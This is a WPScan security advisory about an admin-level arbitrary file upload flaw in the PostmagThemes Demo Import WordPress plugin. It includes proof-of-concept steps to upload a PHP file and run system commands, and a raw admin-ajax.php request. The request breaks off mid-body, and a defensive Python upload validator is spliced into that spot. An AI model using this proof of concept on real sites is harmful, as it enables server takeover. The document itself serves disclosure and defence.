wpvulndb, WPVDB-ID: 77A524D8-0B1A-407A-98D2-D8D0ED78FA0F
History: Nov 11, 2022 - 12:00 a.m.

PostmagThemes Demo < 1.0.8 - Admin+ Arbitrary File Upload

2022-11-11 00:00:00
wpscan.com
security
plugin
arbitrary file upload
rce
admin privilege
system commands
software

EPSS: 0.001 (Low)
EPSS Percentile: 43.1%

The plugin does not validate the imported file, allowing high-privilege users such as admin to upload arbitrary files (such as PHP) leading to RCE.

PoC

1. Go to Appearance » Import Demo Data » Manual demo files upload » Run "Choose a JSON file for customizer import" and import a PHP file.
2. Click Import Demo Data to upload the file.
3. The page returns a 500 error, but the PHP file has been saved in the uploads folder.
4. Access the uploaded file's URL to execute system commands: https://example.com/wp-content/uploads///info.php

Request:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localwp.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localwp.com/wp-admin/themes.php?page=pt-one-click-demo-import
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------9264893373035956623827474357
Content-Length: 1063
Origin: http://localwp.com
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Cookie: admin cookie

-----------------------------9264893373035956623827474357
Content-Disposition: form-data; name="action"

pmdi_import_demo_data
-----------------------------9264893373035956623827474357
Content-Disposition: form-data; name="security"

c34afc948b
-----------------------------9264893373035956623827474357
Content-Disposition: form-data; name="selected"

undefined
-----------------------------9264893373035956623827474357
Content-Disposition: form-data; name="content_file"

undefined
-----------------------------9264893373035956623827474357
Content-Disposition: form-data; name="widget_file"; filename="123.json"
Content-Type: application/json
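The check the advisory says is missing, as an added example that is not the plugin's own code: a validator (written in Python for illustration rather than the plugin's PHP) that accepts a demo import only when the extension, the raw bytes and the parsed structure all look like a customizer/widget JSON export, so a PHP body is rejected even behind a .json or double extension. The function name, messages and sample uploads are hypothetical.

```python
import json
import os
import re

# Only the import format the demo importer actually consumes.
ALLOWED_EXTENSIONS = {".json"}
# Any PHP open tag in the body is disqualifying, whatever the filename says.
PHP_OPEN_TAG = re.compile(rb"<\?(php|=)?", re.IGNORECASE)


def validate_import_upload(filename: str, data: bytes) -> tuple[bool, str]:
    """Return (accepted, reason) for a client-supplied demo import file.

    Hypothetical check: the filename and the content are both untrusted,
    so the extension, the raw bytes and the parsed value are each tested.
    """
    # Drop any client-supplied directory components before reading the name.
    base = os.path.basename(filename.replace("\\", "/"))
    ext = os.path.splitext(base)[1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        return False, f"extension {ext or '(none)'} is not an allowed import type"
    if PHP_OPEN_TAG.search(data):
        return False, "upload contains a PHP open tag"
    try:
        parsed = json.loads(data.decode("utf-8"))
    except (UnicodeDecodeError, ValueError):
        return False, "upload is not valid UTF-8 JSON"
    if not isinstance(parsed, dict):
        return False, "top-level JSON value must be an object"
    return True, "ok"


# Constructed sample uploads (not taken from the advisory): a clean customizer
# export, a plain PHP file, a PHP file behind a double extension, and a JSON
# array where an object is expected.
SAMPLES = {
    "customizer.json": b'{"template": "postmag", "mods": {"blogname": "Demo"}}',
    "info.php": b'<?php echo "hello"; ?>',
    "info.php.json": b'<?php echo "hello"; ?>',
    "list.json": b"[1, 2, 3]",
}


def check_samples() -> dict[str, bool]:
    """Run every constructed sample through the validator."""
    return {name: validate_import_upload(name, body)[0]
            for name, body in SAMPLES.items()}


if __name__ == "__main__":
    for name, accepted in check_samples().items():
        print(f"{name}: {'accepted' if accepted else 'rejected'}")
```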

CPE
Name                       Operator  Version
postmagthemes-demo-import  lt        1.0.8

